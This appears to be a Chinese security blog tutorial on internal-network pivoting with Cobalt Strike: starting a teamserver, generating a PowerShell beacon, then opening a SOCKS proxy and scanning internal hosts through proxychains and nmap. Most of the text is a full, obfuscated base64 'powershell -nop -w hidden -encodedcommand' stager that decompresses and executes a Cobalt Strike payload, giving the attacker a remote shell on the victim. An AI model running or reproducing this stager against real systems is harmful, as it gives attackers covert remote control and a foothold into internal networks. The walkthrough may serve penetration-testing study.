内网渗透 - 代理篇(CobaltStrike代理)
希望你每天醒来都是阳光的,不会因为别人的几句话、几个表情和几个举止,影响自己的心情,好好生活,总会遇见美好的事。。。
---- 网易云热评
声明:贝塔安全实验室公众号文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!
本次所使用的攻击机为kali linux系统,攻击过程中涉及到的工具主要有:proxychains,nmap等。攻击的拓扑结构如下图所示。
01
反弹Shell
首先启动CobaltStrike的服务端,并执行命令如下所示:
>>> ./teamserver 192.168.43.137 xxxxxx启动Cobaltstrike的客户端,并填写运行服务端的ip地址,端口号,用户名,及在服务端设置的密码口令。
进入CobaltStrike客户端控制面板以后,依次点击Attacks>Payload Generator选项,设置监听以及生成payload。
点击Add选项后,设置监听方式及监听的端口号,输出方式选择Powershell Command。
如下为生成的powershell形式的payload。
将复制的payload在目标服务器主机上执行,如下所示:
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhADQAKwBpAFMAaAByACsAMwBQADAAcgArAE4AQwBKAEcAbQAwAEgAOABkAGEAZQB6AFMAUQBIAEIAUgBSAEUAUgBQAEcARwBmAFQAcQBkAEUAawBwAEYAdQBSAFkARgBnAG0AZgBuAHYAMgArAEIAMgB0ADIAegAwADcAMAA3AHkAYQA2AEoAbwBRAHIAZQB5ADEAUABQAGUANgBsAFgAZwAvAGgAUgB3ADgAZwB5ADgATQBnAHoASQBmAFcANABnAEMAaQAwAFAASgBkAGkANwB1ACsAMwBrAFcAdgBnAGIASgAwAHQAWABuAGMAUQB2AC8AcgBJAE0AMQA2AEIAYQBTAEkAWQBoAHQAVABmADkAMwBjAHEAUQBNAEMAaABpAGcAOAB4AFEASwArAE8AWgAwAFkAMgByAEYARAA1AEoAaABPAEUAWgBvAFIAZwA2AGUANwB1AC8AaQA1AC8ARgBiAGsAaAAyAE0ASgBYAEYAMgBBAHIAaABxADgATwB4AEgAdgBQAEQASwBuAHYAVgBQAEcAWgA5AFgAMwBPAGMANABEAGwAdgB2AHoAeABSAHkAOQBDAEMATAByADQAcwBxAC8AMgBJAFcAYgBEAEUARABvAGIAMgA0AEoAaABzAFUAVAA5AGsAMQByAHUASQBZAEsAUAA0ADgAMABCAEcAcABqADYAbQAzAHAANAByAGYAWgB0AGIAdwBQAHMAcQAxAGoAYQBBADgAYQBlAG4ASQBKADEAegBlAHkAYgA3AEIAawBnAE8AMABGAFYAOAAyADAATABGAHcAdAAvAC8AVgBVAG8AUABUAC8AVwBYAHEAcAA4AEUAQQBFADcATABCAGEAMABOAE0AVABRAHEAWgBxADIAWABTAGgAUgBQADAAcQBaAHcAMQBuAHEAdwAyAEoAaABaAEIAbgBJAEMANwAwAHQAcgBpADQAdAB0ADgANQBVADUAegBsADYASgBRAGMALwB1AG0AQQB2AGwASwA0AG4AMgAvAG0AQQBuAE8AUAByAFEAMgBaAFcATAB6AHIARgBBAGwAbQBxAGgAQgB2ADIAdwBtAEcAaABRAGoAMQBuAC8AcAA1AGYAWABxAGcALwAzADkAQgBNAEkAeABkAGIARABxAHkASwBMAG8AYgBJADgAegBXAEkAWQBzAHUAQQBZAFgAVQBBAFgATgBPAEcAVQA3AGcAbABhAG8AVwBRAHgATQB6AGQARgBVAG8ARQBCAEkASQA0AFEAaQA1ADEAdwAwAEwAMABZAHUAOABJAGkAdwA5AHUAWgBOAHMAVgBZAHYAZgA1AGQAKwAyACsARgBCAFYANAB1AHAASAA3AHUAMAByAEYAagAwAHAARQBTAHMAVwBvAFYATABuAG0AeABPAC8AUQBNAGMAcgB6ADUAbQBLAE8ASABPAGMAWAA5AEIAKwBTAHEAMABSACsAdgB5AFIAWQA2AGYANwBIAFoANgBsAHEAUQBoAHYAdQBBAEkAYQB2AG0AUABEADcASQBWAGYAdgA3ACsANgBlADgAeQBVAGsANQB5AG0AcQBYAG0AagBsAGUAdAA4AHAAdQBrAEsATgBDAEEAaQBBAFAAWgBSAG0ANABaAHkAaABDAEoAWgBlADMAdQBOAHoAYwBYAHYAVABEAEMAdABmAEcAcQByAGQAdABLADQANgBsAC8AQgBjAGMASAB5AG4AbgBoAGUAZQBaAGIANwBjADMANQBYAHUAcgA5AG0AVAB2AFgALwBkAFIASgBaAHQAUQBwAFIAOQAvADcAbwBhAE8ATABpADEAWABNAGkAbABMAG4AQQBzADQANQBiAHcAeABjADkAaQBCAHIAYwAyAHoAUABtAG8AMwBzAFEAVQBnAHIATgBZAHUASAA2AEEASgBuAGQAbABwADUAQQBSACsAdgB5AHIARwB1ADkAWQArAEUAMgAzAGUAdwBIAEgARwBpAFQAdQBJAFUARgBGAFUAcQBMADAATQA1AGgATABEAEkAcwBGADAAUgAxAEIAaAAvAEIAMwAyAFoATQAwAGYAZABpAFMATQBvAE0AMwA2AFcAdABwAHAAVABmAHYAMgBUADcATAA1AFoANABOAHcAcgBCAEMAcQBSAEcAcABjADYATgBDAGEAUgBEAFkAMABLAHgAUQByAEIAdABhADEAMAA5AHMAaABMADEAOABXAFgAaQBIAE8ANABwAHMAYgBCAGsAZwB4AEQAZAB6AEwANgBWAFAASwBMADIANgA3AG4AawB1AHEAWgBqAEkASQBOAEUAbABOAE0AdwAwAEgAeABvAFcAcwBEAE4AVwBLAHQAVABBAE0AbQBFADMAMQBhAHoAZABEAFUATABoAFUAMAA1ADYAdwBMAFoASgB5AFIARgBMAE0AWQBrAEoAZQBaAE4AeABvAGUARQBzAFoANQBCAFoAKwBmAGYAOABLAEYAVQAxAGkARQBYAEgAdAA2AEYARABwAFAATQB1AEoATgBoAGcAUgAzAHIATwB0AGEATAB5AGQAQQBNADcAYQBCAGIAKwBBACsAeABiAG4AVgB5AEsASQB1AFAAcQBSAHQASQBIADAAQwBRAEIATgBOAHYARABGAFcAcABoAEkAVQB6ADYAVwBxAEgAeQBTACsATAA5AGIALwBCACsAYgBqAEUALwB3AGUAdwBoAGUAQQAxAGsATQBTADkARQBjAFUAcwBhACsAcQBVAEwARQBIAFoAQwA2ADAAeQBhAE0AUQB5AG8AcAAxAEoAVwBnAHMALwBkAEYARwBlADEAbABKAHMAeABzAHUAdgBtACsAeAB2AFIATwBhADAASQBFAHkAVQBCAGUAVQA0AFgAaABMAEQAVgAwAFAASQBlAFYAeQB6AFUAbQBXAGkAWABkAEYAUwA1AGwAWQA0AE8ASQBpAE8AbAB1AHEAcwBrAGgAcgB0AEEAZgBDAHoAMABRAFcAdQBmAFQASgBqAEkATQAyAFkAWQBCAFEATwBlAEkALwB1AHAAdwBZAFMAaAAzAGIAZgA5AHoAVgA0AE8AUQBDAEkAZgBEAGsAbQBuAHQAMABwADUAbABXAFYAawBxADIAVQAxAEwAVABHAFMAdQAyAGQAWABzAEEAeQBIADYARQAzAEcAbgBqADcAdABJAEQARgBXAEIATQA4AE8AMgA4AE8AZQBzAEoAdwBEADYAeABEAGsAdgBpAEsAbgBVAFQATgA1AGsATQBwAG4AbwA3AFYASABZAHcAWgA2ACsAawBrAEoAeABGAGgAbAB6AFcAVgBzAHQASgB5AGgASgA3AFEAdwAwAFYAMQBFAGYATwBRAGoAUABoAHEAcgBlAGkAUQBIAHMAaQBOAGEAagBYADMATQBMAGIAQQBVAGkALwAyAG4AdwBaAEQAUgB3AFoATwA5AGEAYwBOAGMAMwB3AHcAeQBYADMAcQB3AGkAMABHADIAUAAzAGUAeQB2AFIAWAAwAEkATQByADgANgBJAFIAOQBXAEsAKwAxADQARgBKAHEANgA2ADUAdgB3AFcAVwAwAE8ANQA4AFUAeQB6AEQAUABIAEcAUQBrADgAagA3AHkAUgBvAFkAZgAxAHAAVwB6AHMAVAAwAGUARAA4AEMAdgB6AGIAVgBqAGIAVABpAGIAcgAxAGUARQBtAHgAbwBJAGsATABCAHAASQBVADMAMwA3AFgAagBCAHoAbwA5ADEAZABZADEAeQBiAEwARgBBAE0AQwBvAFoAVABzAHQAZwBwAEwAUAB1AEgAOQBmAG0ASQB1AEQAcgA2AGsAYQBjAEQAMgB3AFUAUgBKAEwAbABOAE0ATwB1AG0ARgA1AGwASABDAG4AVgB0AEMANQA1AEQAdABmAG0ATQBIAGgAcQBtAG0AYwBtAEgAZgBnAE4AMABFAEkAVwA0AFQAUQBoAGYAdABvAFoAdgA4AFkAOABQAEkAagBMAHMAVwB1AHMAQgBNAHMAeAA5AGcAdwAzAFAAUgBnAGQASgB3AHEAYQBCAEgAZABqAG8ARQBqAEQAVgBZAEkAQwBMAEsARQBnAHQAbwBQAG0AVwBEAFUAeQAzAEwAbABlAEoAagA5AHAAMgBPAE0AYQBrAFEAOAAyAEIAMwBrAEkAeQBxAEkAMQBPAG8ARABPAE8AWgBTAEgATQBNADcAVwBxAGMAbwBOAGsAMQBRADgAaQBFADkAUgBOADkAUABqACsAdABKAE8AbQA1ADgATwBOAEUAKwBmADUATgA1AHUAYQA0AFMAUgBJAEkAdwA5ACsAVgBzAFQAUwBMAHcAeQBtAHQARQBLAHEANQBjAFYAdgBXAE0AUABEAEoAUwBlAFcASAAyAHEAbQB5AEoAcwAwAGsAbwBYAGEAZQBPAHcAbgB0AEMAZQB0ADkAUgBYAGQAbwBpAE4AdwBXAFEARwBKAHUAWQBaAE0ARwBQAFoANgA4AGoAVwBXAHMARgBEAGYAbABYAGYAMQBkAEIAUwBsAGoAUQByAEcASwBjAEsATQArAGYAWABVADgANgBSACsATwBtAHgAdAB1AHAAUABsAEcAZwBtADIATQBNAFoAMwBlAGwAeABYAFYAMwBoAFQAeQBOADUAdwBpAGYAagBPAFMAMgB0AHQASwBPAGcAVAB2AGMANwBiAHUATgAyAGcALwBWAHUAcABQAEUAbgBlAHQAWgBuAEYAWgByAEUAWgBEAEEAVABwAGgATwBXAHEAZABYAFoAWgBLADcAdwAwAHgAMQBuADkAaABOAGEAbQBCAG8ANgBXAHoAZQBuADIAdABIAHMAegB4AGIARwBTAEoAagBrADgAdgB0AE4AMwAzAGYANgArADcAMgB6AFcAYQAxAFAAUABhAHYAaABpADYAZgBwAFMAZgBLADcAdgBMAGcATABvADIANQA1AHQAMQBhADQAaABjAEwAWgBxADQAawByADcASgBsAEQAMwBEADYAcABtAHEAZAAyAE8ATgBSAFMAegAvAFoAeAByAFoAWgBwAHgAdQAxAGcANgBhAEIATgBsAFQATABmAFYAagB3AG0ATwBTAFAAdgBaAEQAYQBDAHQASgA3AE0AaABtAGMAdwBTADIAYwBIAHYATwBWAEMAdABVAFkAMwBXAHoAbwB6AGwANQBVAFQAbAA5AFMANwBRAG4ATwA1AGwAWAB1AGUAMwBtAHkAZQBZADgAWQBvAG0AeAAxADIATABXADIAVABPAEoARABNAGEAZABJAG8AZgA0AHYAcgAzAGYAQQAwAEUATgBkAGUAbwB2AEoATgBWAFcAbABLADcARgBZAGEATgAvAHEAbQB2AHAAVgAyAHIAdQBRAHgATQA0AEkAVQAxAHoAcgBiAGMASABqAGkAYQBzAEoAaQBOAFAAWAA4AG0AdQBvAE8ARwB1AHUAbQB2ADIAOABtAHMASQAzAFMAcwBJADQARwB6AG0ANQB4AGwARwBsAGwAdgB6ADEAQQBqADMAYQA2AFAAcQBRAFAAdQBLAFYAeQBZAEQAcQBTADAAQwBSAEsAcwBRADYAZABTAFcAMgBoAHIAcgA2AEoANgBVAEMAYwBKAFAAeQBXAGQAWgB6AGgAeABnAGcAWABXAGsAdQBkAEwAZABwAEQATQBKAEEAUwBIAEUAMgBqAHAANABQAHUAMQAyAGUAMgBKADkAUQB1AE8AUgAyAHMAUwBhADYAUwBHAGgAMQB1AHgASABOAFcAcQAwAE8AZwA1AHoAVQA3AFgATQBPAEcAZQBVAHIAdwBtAFEASAB0ADcAcwBuAG8AUgAwAEYAQwAvAGoAVABKAHkAZgBLAFMAeQBKADQAeQBtAFMAQgBnAFMARgA2AFAATgBzAHYAZwBSAFAASQBhAHQARABpAFgAYgBXADAATwBpACsAWgBDAEMASABwAFQASgBFAFkAOQBVAHYAYwBiAEcAdABaAHgARwA2AFQANgBRAFMAUgAyAGoAVABJAG4AeAAwAHIAYgBxAEgAZABGAHcARQA5AG8AVABaAGkARwBpAHAAQwB3AEMAcgA5AG4ANQB5AEsAZABTAGsAYgBFAGYAcwA5AGIANQBkAFoARABaAFAAcABKAHMAbwBuAGkASAB4AFIANQBQAHQAcQBZAGUAbQB0ADQAcABNADIAUgA5AHAAcQA5AEwANQBmAHoAbABuAGoAMwA5AHUAbgA1AEkAWABtADUAagBaAEYAdgArADgAZABOAFEAcwB6AFYAbQAvAGQAMwBQADIANwB6AFEAZwB3ACsAZABNADIAdgBwAHIATQBSAFEATwBFAGUAMgBLAFMAYgBrAGcAbgByAGQAagA4AEsASABoAEsAdQBjADUATABxAFcAWgBsAEcAcwBmAGoANQBhAEgAKwBFAHkASQBVADIARwBYAHYASgBZAEgAeQA3AFYAVgBqAGIAOQBvAHgAcwBzAHYAdABpAHgAUAByAHoAcgBlACsAVAAyADMATgBPAGwAbgBYAG0AMAAxAFgAcAAvAFkASQBvAGwAVwA1AFgAMwB5AGIAYQBiAHYAUAB4ADUAMwByAEUAMgB4AFQANABmAHAAVwBzAHkAZgBrAHEASAA0AGkAVQBvAGIAdgBEACsAdwBwAEYASgAzAFcAYQBwAHIATgBuAGcAeQBiAFcAZgBwACsAWQBuAHUAZQBuAHgAVABkADcAbABXAHoAKwArAHcARABsAG8AeQBzADcAZAAvAFUAMgBzAEsASABJAGQAZQBEAC8ATQBRAFkALwBlAGYAMwB2ADcARwBiADgANQBUAFAAawBPADMAcwA1AG8AcwA4AHAAeQB5ADcAbABmAHcARwB4ADMAMQBUAGcANAB3ADAAQQBBAEEAPQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA
执行结束后,成功反弹目标主机的交互式shell。此处可以执行sleep 0设置与目标交互的时间周期。执行shell whoami命令,可对目标主机执行远程命令。
02
添加sock4代理
在获得了基础的交互shell以后,选择该beacon右键,依次点击Pivoting->SOCKS Server选项,并设定相应的端口号,此处系统默认的端口号为23612。
通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.237.129的web应用,相关配置如下所示:
我们也可以应用 proxychains 工具,进行内网探测,使用编辑器在文件件/etc/proxychains.conf 的最后一行加入 socks4 代理的配置信息。
--- snippet ---[ProxyList]# add proxy here ...# meanwile# defaults set to "tor"socks4 127.0.0.1 23612
通过执行代理工具 proxychains,对内网主机 ip 地址为192.168.237.127进行端口探测。执行指令如下所示:
>>> proxychains nmap -sT -Pn 192.168.237.129
- 往期推荐 -
内网代理篇(一):reGeorg+Proxifier代理
内网代理篇(二):MSF代理
禁止非法,后果自负
欢迎关注公众号:web安全工具库
